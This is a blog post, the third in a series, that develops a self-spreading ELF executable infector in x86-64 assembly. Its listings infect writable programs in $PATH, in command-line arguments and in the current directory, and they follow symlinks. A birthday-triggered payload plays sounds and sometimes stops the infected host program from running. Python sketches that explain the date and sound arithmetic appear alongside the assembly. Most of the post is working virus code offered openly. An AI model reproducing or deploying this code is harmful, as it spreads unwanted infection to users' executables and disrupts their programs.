Introduction

In the third post of the ELF file infection series, I would like to tackle a few issues that were left unresolved by the second post. To name a few:

  • The program’s spreading mechanism is still not satisfactory. The program spreads to $PATH, which is an effective strategy to ensure persistence in the system. However, most executables in $PATH are probably not writable by the user, so infecting them requires root privileges. This is not entirely a problem, since some of the executables in $PATH are owned by the user (e.g. on my system, this is the case for cargo, rustc and a few other programs), and this can be exploited to spread the ELF infector. One way to solve this problem is to also try infecting the programs passed as arguments to the infected executable and the programs in the current working directory, to ensure that the infector can, at some point, find another host.
  • There is no actual payload that would indicate the presence of the infector in the system.
  • The payload is not compressed. This is not a problem in itself; however, it would be nice to have a compressed payload to reduce the size of the infected executable. This will also make it harder to detect the infection, since the infected executable will be smaller than the original one.

The spreading mechanism.

I will start fixing the problems in order. To address the first problem, the entry point of the stub needs to be altered to call more than one infection routine.

; The entry point.
_start:
    ; Load the executable to a memfd.
    call load_elf
    ; Load the argp for the first payload.
    mov rdi, [rsp]
    lea rdi, [rsp + 8 + rdi * 8 + 8]
    call infect_path
    ; Load the argv for the second payload.
    lea rbx, [rsp + 8]
    call infect_argv
    ; Infect the current directory as the third payload.
    call infect_selfdir
    ; Call the final birthday payload.
    call birthday
    ; Load the path to the executable
    mov rdi, memfd_path
    ; Prepare to call execve
    ; Load argc + argv
    lea rsi, [rsp + 8]
    ; Load argp
    mov rdx, [rsp]
    lea rdx, [rsp + 8 + rdx * 8 + 8]
    ; Perform the syscall
    push sys_execve
    pop rax
    syscall
    ; Exit in case execve returns due to error.
    mov rdi, -1
    push sys_exit
    pop rax
    syscall

The implementation of infect_argv is pretty straightforward:

infect_argv:
    ; Load two constants related to access() to
    ; avoid having to reload them in the loop.
    ; We're interested in the syscall number
    ; and the two arguments specifying access
    ; mode.
    push sys_access
    pop r14
    push 6 ; R_OK | W_OK
    pop r15
.argv_loop:
    ; We could use argc, but we can also assume
    ; that argv is terminated with a NULL.
    mov rdi, qword [rbx]
    test rdi, rdi
    je .done
    ; Check if we can infect the file. Don't bother
    ; trying to tweak the permissions.
    mov rsi, r15
    mov rax, r14
    syscall
    ; access() returned nonzero -> we can't infect
    test eax, eax
    jne .skip_infect
    ; Load the path to the executable and infect it.
    mov rdi, qword [rbx]
    call infect
.skip_infect:
    ; Skip to the next pointer in the argv array.
    add rbx, 8
    jmp .argv_loop
.done:
    ret

Infecting the current directory can be done in a hilariously cheeky way: by passing PATH=. to infect_path.

infect_selfdir:
    ; Reserve some space on the stack.
    sub rsp, 40
    ; Load the first buffer with PATH=.
    lea rax, [rsp + 9]
    mov dword [rax], 'PATH'
    mov word [rax + 4], '=.'
    mov byte [rax + 6], 0
    ; Write the buffer as the first entry and NULL-terminate the
    ; artificial ARGP.
    lea rdi, [rsp + 16]
    mov qword [rdi], rax
    and qword [rdi + 8], 0
    ; Infect.
    call infect_path
    add rsp, 40
    ret

We will also start following symlinks in the directory infection procedure:

.discard_loop:
    ; Done processing?
    cmp r14, r15
    jbe .getdents_loop
    ; Extract the type of the directory entry.
    movzx ecx, word [rbx + 16]
    mov dl, byte [rbx + rcx - 1]
    ; Skip if not a regular file or a symlink.
    and dl, -3
    cmp dl, 8
    jne .give_up

The payload.

For the purposes of this blog post, I will assume that the target operating system uses OSS sound (and not e.g. ALSA), as ALSA has proven to be too unreliable and convoluted in my tests to be of any particular interest. Thankfully, on modern Linux distributions we can enable OSS compatibility using sudo modprobe snd-pcm-oss.

I would like the payload to activate on my birthday (9/7/2004, every year). This is not as simple as it sounds (surprised yet?) because most time-related system calls in Linux are dispatched via the vDSO, which puts me in an inescapable low-level programming heck. An idea that is simpler to explain is to query the UNIX time stamp with the time system call and compute the day of the month and the month from it myself. It’s not as difficult as it seems, although it involves some peculiarities.
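
The date arithmetic is easier to follow in a higher-level language first. The Python sketch below is only a model of the idea, not the author's code: the function name day_and_month and the constant names are made up for illustration. It assumes the same simplification as the assembly listing, namely a four-year cycle anchored at 1970 in which the third year is the leap year, which holds from 1970 through 2099. The two tables store the zero-based index of the last day of each month, preceded by -1.

```python
SECONDS_PER_DAY = 86400
YEAR = 365 * SECONDS_PER_DAY          # 31536000
FOUR_YEARS = 1461 * SECONDS_PER_DAY   # 126230400

# Zero-based day-of-year index of the last day of each month, preceded by -1.
DAYS = [-1, 30, 58, 89, 119, 150, 180, 211, 242, 272, 303, 333, 364]
LDAYS = [-1, 30, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334, 365]


def day_and_month(timestamp):
    """Return (day_of_month, zero_based_month) for a UNIX time stamp in UTC.

    Hypothetical helper; only valid while every fourth year is a leap year.
    """
    rem = timestamp % FOUR_YEARS
    if rem < YEAR:
        # First year of the cycle (1970, 1974, ...).
        table = DAYS
    elif rem < 2 * YEAR:
        # Second year of the cycle.
        rem -= YEAR
        table = DAYS
    elif rem < 3 * YEAR + SECONDS_PER_DAY:
        # Third year of the cycle: the leap year (1972, 1976, ...).
        rem -= 2 * YEAR
        table = LDAYS
    else:
        # Fourth year: skip three years plus the leap day.
        rem -= 3 * YEAR + SECONDS_PER_DAY
        table = DAYS
    day_of_year = rem // SECONDS_PER_DAY
    month = 0
    while day_of_year > table[month + 1]:
        month += 1
    # Subtracting the last index of the previous month gives a 1-based day.
    return day_of_year - table[month], month
```

For example, day_and_month(0) gives (1, 0), i.e. 1 January. The month is zero-based in this model, so July is 6 and August is 7, which is worth keeping in mind when reading the final comparison against 7 in the assembly.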

sys_time equ 201

birthday:
    ; Ask for the current UNIX time.
    mov eax, sys_time
    xor edi, edi
    syscall
    ; Determine whether we are dealing with a
    ; leap year. We want to obtain the divmod of
    ; the UNIX time stamp and four years expressed in
    ; seconds (1461 * seconds in a day) = (1461 * 24 * 60 * 60)
    ; = 126230400
    mov ecx, eax
    mov esi, 126230400
    xor edx, edx
    div esi
    imul rax, rax, -126230400
    add rax, rcx
    ; Determine the correct year in the four year interval.
    ; If the remainder of the divmod is less than a year, we are
    ; in the first year and no adjustment is needed.
    ; 31536000 is the amount of seconds in a non-leap year.
    cmp rax, 31536000
    jl .year_ok
    ; Check if we're in the 2nd year of the 4 year interval.
    ; Easy to notice that this constant is the amount of seconds
    ; in two years.
    cmp rax, 63072000
    jb .sub_year
    ; Same logic as above, except that the third year of the interval
    ; is a leap year, so the bound is three years plus one leap day
    ; (1096 days = 94694400 seconds). Leap years use a separate table.
    cmp rax, 94694400
    jb .is_leap
    ; Fourth year: subtract three years' worth of seconds plus the leap day.
    sub rax, 94694400
    jmp .year_ok
.sub_year:
    ; Subtract a year's worth of seconds.
    sub rax, 31536000
.year_ok:
    ; Calculate days since 01/01.
    mov ecx, 86400
    xor edx, edx
    div rcx
    cdqe
    ; Load the running total of days in each month.
    mov rcx, days
.determine_month:
    push -1
    pop rdx
.month_loop:
    ; Bump up the month until exceeded days since 01/01.
    lea esi, [rdx + 2]
    movsxd rsi, dword [rcx + 4 * rsi]
    inc edx
    cmp rax, rsi
    jg .month_loop
    ; Save the month value for later.
    mov esi, edx
    ; Load the day of month.
    movsxd rcx, dword [rcx + 4 * rsi]
    sub rax, rcx
    ; Check if the day and month match.
    cmp rax, 9
    jne .heck
    cmp edx, 7
    jne .heck
    ; Pick a random number and proceed only with 10% probability...
    imul rax, qword [rip + seed], LCG_A
    add rax, LCG_B
    mov qword [rip + seed], rax
    push 10
    pop rcx
    xor edx, edx
    div rcx
    test rdx, rdx
    je proceed
.heck:
    ret
.is_leap:
    ; Compute day of year and load the leap days LUT.
    sub eax, 63072000
    mov ecx, 86400
    xor edx, edx
    div ecx
    mov rcx, ldays
    jmp .determine_month

ldays:
    dd -1, 30, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334, 365

days:
    dd -1, 30, 58, 89, 119, 150, 180, 211, 242, 272, 303, 333, 364
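
The random roll at the end of the routine is a plain linear congruential generator. As a minimal sketch, assuming the LCG_A and LCG_B values from the standalone listing at the end of this post and 64-bit wrap-around as in the imul/add pair, it can be modelled as follows. The names lcg_next and roll are hypothetical.

```python
LCG_A = 1103515245
LCG_B = 12345
MASK64 = (1 << 64) - 1  # registers wrap around at 64 bits


def lcg_next(seed):
    """Advance the generator by one step: seed * A + B modulo 2**64."""
    return (seed * LCG_A + LCG_B) & MASK64


def roll(seed, sides):
    """Return (new_seed, hit), where hit is True when new_seed % sides == 0.

    This mirrors the unsigned div followed by the test of the remainder.
    """
    seed = lcg_next(seed)
    return seed, seed % sides == 0
```

With sides set to 10 this gives roughly a one-in-ten chance per call, and with 3 roughly one in three, provided the seed is reasonably well mixed.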

The routine will call the proceed function once ready. My silly idea is surprisingly simple:

  • Open /dev/dsp1.
  • Play a second or two of a suspenseful sound.
  • Pause the execution for a second.
  • Play either a “cheery” or a “doomy” sound.
  • If the cheery sound is played, nothing happens and the /dev/dsp1 descriptor is closed.
  • If the doomy sound is played, the executable attached to the program does not launch and we exit with return code 0.

proceed:
    ; Open the sound device.
    mov rax, 2
    mov r8, 1
    mov edi, snddev
    mov rsi, r8
    syscall
    ; Play the "suspense" sound.
    mov edi, eax
    xor ebp, ebp
    ; Load the place on the stack where the sample is saved.
    lea rsi, [rsp - 4]
    xor ebx, ebx
.susp_loop:
    ; 58000 ticks.
    cmp ebx, 58000
    je .susp_done
    ; Generate the sample.
    mov ecx, ebx
    shr ecx, 13
    and cl, 27
    mov eax, 322376503
    shr eax, cl
    and eax, 127
    imul eax, ebx
    mov ecx, ebx
    shr ecx, 4
    or ecx, ebp
    or ecx, eax
    ; Save and write.
    mov dword [rsp - 4], ecx
    mov rdx, r8
    mov rax, r8
    syscall
    ; Loop again.
    inc ebx
    add ebp, 32
    jmp .susp_loop
.susp_done:
    ; Purposefully waste some CPU cycles for delay.
    mov eax, 100000
.busy:
    sub eax, 1
    jb .busydone
    nop
    jmp .busy
.busydone:
    ; Roll a dice. 33% chance of playing the "doomy" sound.
    imul rax, qword [seed], LCG_A
    add rax, LCG_B
    mov qword [seed], rax
    xor ebp, ebp
    mov r9, 3
    xor edx, edx
    div r9
    test rdx, rdx
    je .doomy
    ; Generate the "good" samples!
    mov r10d, 1
    mov ebx, 8
    mov ebp, 13
    lea rsi, [rsp - 12]
    mov r14d, 12
    ; The song is procedurally generated in three stages:
    ; stage 0, stage 1 and stage 2.
.good_main:
    cmp r10d, 106000
    je .good_done
    mov eax, ebp
    mov ecx, ebx
    cmp r10d, 35000
    jb .good0
    cmp r10d, 67499
    ja .good1
    lea ecx, [r10 + 8 * r10]
    mov eax, ebp
    jmp .good0
.good1:
    cmp r10d, 83999
    ja .good2
    lea ecx, [r10 + 8 * r10]
    mov eax, r14d
    jmp .good0
.good2:
    lea ecx, [8*r10]
    cmp r10d, 98000
    mov eax, ebp
    sbb eax, 0
.good0:
    mov edx, r10d
    shr edx, 2
    imul eax, r10d
    add eax, edx
    mov edx, r10d
    shr edx, 3
    or edx, ecx
    mov ecx, r10d
    shr ecx, 5
    or ecx, edx
    or ecx, eax
    ; Write the sample.
    mov dword [rsp - 12], ecx
    mov rdx, r8
    mov rax, r8
    syscall
    inc r10d
    add ebx, 8
    jmp .good_main
.good_done:
    ; Close file descriptor (r9 holds 3, which is also sys_close).
    mov rax, r9
    syscall
    ; Cheery outcome: return so that the attached executable still runs.
    ret
.doomy:
    ; "Doomy" track.
    lea rsi, [rsp - 8]
.doomy_loop:
    cmp ebp, 250000
    je .exit
    mov eax, ebp
    shr eax, 11
    mov ecx, ebp
    shr ecx, 1
    or ecx, eax
    imul eax, ecx, 430
    ; Write the sample.
    mov dword [rsp - 8], eax
    mov rdx, r8
    mov rax, r8
    syscall
    add ebp, 5
    jmp .doomy_loop
.exit:
    ; Doomy outcome: exit with code 0.
    mov rax, 60
    xor edi, edi
    syscall

snddev: db "/dev/dsp1", 0
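
The three tracks are "bytebeat"-style formulas: each sample is an integer expression of a counter t, and only the low byte reaches the device because every write call sends a single byte. The Python sketch below restates those expressions as read from the listing; the function names are invented for illustration, and the playback rate depends on how the device is configured (traditionally OSS defaults to 8-bit unsigned mono at 8 kHz, which is assumed rather than verified here).

```python
def suspense_sample(t):
    """Suspense track, t = 0 .. 57999."""
    shift = (t >> 13) & 27
    factor = (322376503 >> shift) & 127
    return ((t >> 4) | (t * 32) | (t * factor)) & 0xFF


def cheery_sample(t):
    """Cheery track, t = 1 .. 105999; parameters change with t."""
    if t < 35000:
        a, c = 13, 8 * t
    elif t < 67500:
        a, c = 13, 9 * t
    elif t < 84000:
        a, c = 12, 9 * t
    elif t < 98000:
        a, c = 12, 8 * t
    else:
        a, c = 13, 8 * t
    return ((t >> 5) | (t >> 3) | c | (a * t + (t >> 2))) & 0xFF


def doomy_sample(t):
    """Doomy track, t = 0, 5, 10, ... below 250000."""
    return (((t >> 1) | (t >> 11)) * 430) & 0xFF


# Raw unsigned 8-bit sample streams, one byte per write in the assembly.
suspense = bytes(suspense_sample(t) for t in range(58000))
cheery = bytes(cheery_sample(t) for t in range(1, 106000))
doomy = bytes(doomy_sample(t) for t in range(0, 250000, 5))
```

Keeping only the low byte is safe in this model because 32-bit overflow in the assembly never changes the lowest eight bits of a product or sum.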

Conclusion

Having added a small payload, I think that my ELF infector is complete. Even though I technically have not implemented payload compression, the executable file is small enough (~2.3KB) that compression would be unlikely to yield any gains.

Finally, the payload can become a program on its own, which you are encouraged to test (harmless!):

format ELF64 executable
use64

entry _start

seed: dq 0

LCG_A equ 1103515245
LCG_B equ 12345

_start:
    ; Query the current time stamp counter as a source of randomness.
    ; rdtsc will set rdx and rax to the higher and lower bits of the time
    ; stamp counter, so we put them together and store them in the RNG seed
    ; variable.
    rdtsc
    shl rdx, 32
    or rdx, rax
    mov qword [seed], rdx
    ; Open the sound device.
    mov rax, 2
    mov r8, 1
    mov edi, snddev
    mov rsi, r8
    syscall
    ; Play the "suspense" sound.
    mov edi, eax
    xor ebp, ebp
    ; Load the place on the stack where the sample is saved.
    lea rsi, [rsp - 4]
    xor ebx, ebx
.susp_loop:
    ; 58000 ticks.
    cmp ebx, 58000
    je .susp_done
    ; Generate the sample.
    mov ecx, ebx
    shr ecx, 13
    and cl, 27
    mov eax, 322376503
    shr eax, cl
    and eax, 127
    imul eax, ebx
    mov ecx, ebx
    shr ecx, 4
    or ecx, ebp
    or ecx, eax
    ; Save and write.
    mov dword [rsp - 4], ecx
    mov rdx, r8
    mov rax, r8
    syscall
    ; Loop again.
    inc ebx
    add ebp, 32
    jmp .susp_loop
.susp_done:
    ; Purposefully waste some CPU cycles for delay.
    mov eax, 100000
.busy:
    sub eax, 1
    jb .busydone
    nop
    jmp .busy
.busydone:
    ; Roll a dice. 33% chance of playing the "doomy" sound.
    imul rax, qword [seed], LCG_A
    add rax, LCG_B
    mov qword [seed], rax
    xor ebp, ebp
    mov r9, 3
    xor edx, edx
    div r9
    test rdx, rdx
    je .doomy
    ; Generate the "good" samples!
    mov r10d, 1
    mov ebx, 8
    mov ebp, 13
    lea rsi, [rsp - 12]
    mov r14d, 12
    ; The song is procedurally generated in three stages:
    ; stage 0, stage 1 and stage 2.
.good_main:
    cmp r10d, 106000
    je .good_done
    mov eax, ebp
    mov ecx, ebx
    cmp r10d, 35000
    jb .good0
    cmp r10d, 67499
    ja .good1
    lea ecx, [r10 + 8 * r10]
    mov eax, ebp
    jmp .good0
.good1:
    cmp r10d, 83999
    ja .good2
    lea ecx, [r10 + 8 * r10]
    mov eax, r14d
    jmp .good0
.good2:
    lea ecx, [8*r10]
    cmp r10d, 98000
    mov eax, ebp
    sbb eax, 0
.good0:
    mov edx, r10d
    shr edx, 2
    imul eax, r10d
    add eax, edx
    mov edx, r10d
    shr edx, 3
    or edx, ecx
    mov ecx, r10d
    shr ecx, 5
    or ecx, edx
    or ecx, eax
    ; Write the sample.
    mov dword [rsp - 12], ecx
    mov rdx, r8
    mov rax, r8
    syscall
    inc r10d
    add ebx, 8
    jmp .good_main
.good_done:
    ; Close file descriptor.
    mov rax, r9
    syscall
    jmp .cleanup
.doomy:
    ; "Doomy" track.
    lea rsi, [rsp - 8]
.doomy_loop:
    cmp ebp, 250000
    je .cleanup
    mov eax, ebp
    shr eax, 11
    mov ecx, ebp
    shr ecx, 1
    or ecx, eax
    imul eax, ecx, 430
    ; Write the sample.
    mov dword [rsp - 8], eax
    mov rdx, r8
    mov rax, r8
    syscall
    add ebp, 5
    jmp .doomy_loop
.cleanup:
    ; Exit with code 0.
    mov rax, 60
    xor edi, edi
    syscall

snddev: db "/dev/dsp1", 0

As usual, the source code for this and all the other posts in this series is available on GitHub!